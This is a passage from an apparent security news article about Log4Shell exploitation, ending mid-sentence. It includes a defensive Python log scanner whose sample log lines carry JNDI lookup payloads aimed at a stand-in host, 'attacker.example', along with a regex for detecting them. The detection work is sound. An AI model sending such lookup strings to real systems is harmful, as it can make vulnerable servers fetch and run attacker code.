Recently a public exploit for the major zero-day vulnerability known as ‘Log4Shell’ in the Apache Log4j Java-based logging platform has been made available.
Log4j is a development platform that enables developers to include error and event logging into Java applications.
Threat actors can exploit the vulnerability by crafting JNDI lookup strings that, when logged by Log4j, force the platform to connect to the attacker-supplied URL and execute the code it returns. This makes it simple for attackers to discover susceptible devices and execute code served by a remote site or delivered via Base64-encoded messages.
Researchers have identified the first public instance of the Log4j Log4Shell vulnerability being leveraged to download and install malware.
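Because the lookup string has to pass through a logged field (a User-Agent, a request path, a form value) before Log4j interprets it, web and application logs are where defenders can see exploitation attempts. The following scanner is an added example, not code from the article or from Bitdefender: it flags the `${jndi:...}` lookup pattern the article describes, pulls out the callback scheme and host so an analyst can pivot on them, and lists the hosts for egress-filter review. The log lines and the host `attacker.example` are constructed sample data.

```python
import re
from typing import Dict, Iterable, List, Optional

# Matches a Log4j JNDI lookup of the form ${jndi:<scheme>://<host>...}.
# Case and surrounding whitespace are tolerated because Log4j's lookup
# parser is lenient about both.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//(?P<host>[^/}\s]+)",
    re.IGNORECASE,
)

# Constructed sample access-log lines (not from the article). Lines 2 and 3
# carry a JNDI lookup in the User-Agent field; lines 1 and 4 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${jndi:rmi://attacker.example:1389/x}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "POST /search HTTP/1.1" 200 88 "-" "curl/7.79.1"',
]


def find_jndi_lookup(text: str) -> Optional[Dict[str, str]]:
    """Return the scheme and callback host of the first JNDI lookup in text, or None."""
    match = JNDI_LOOKUP.search(text)
    if not match:
        return None
    return {"scheme": match.group("scheme").lower(), "host": match.group("host")}


def scan_log_lines(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Scan log lines and return one hit record per line containing a JNDI lookup."""
    hits: List[Dict[str, object]] = []
    for line_no, line in enumerate(lines, start=1):
        found = find_jndi_lookup(line)
        if found is None:
            continue
        hits.append(
            {
                "line": line_no,
                "scheme": found["scheme"],
                "host": found["host"],
                "raw": line.strip(),
            }
        )
    return hits


def callback_hosts(hits: List[Dict[str, object]]) -> List[str]:
    """Deduplicated, sorted list of callback hosts for egress-filter or blocklist review."""
    return sorted({str(hit["host"]) for hit in hits})


if __name__ == "__main__":
    results = scan_log_lines(SAMPLE_LOG_LINES)
    for hit in results:
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']}")
    print("hosts to review:", callback_hosts(results))
```

Run against real access logs, the same functions work on any line-oriented log that records request headers; the only assumption is that the logged field still contains the literal `${jndi:` text, which is the case when the vulnerable lookup has not already expanded it.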
While this vulnerability was patched in Log4j 2.15.0 and even hardened further in Log4j 2.16.0, threat actors are still using it to install malware such as currency miners, botnets, and even Cobalt Strike beacons.
Bitdefender researchers discovered the first ransomware family being installed directly through the Log4Shell vulnerability.
While most of the attacks observed so far seem to be targeting Linux servers, we have also seen attacks against systems running the Windows operating system. For these attacks, we have detected the attempt to deploy a ransomware family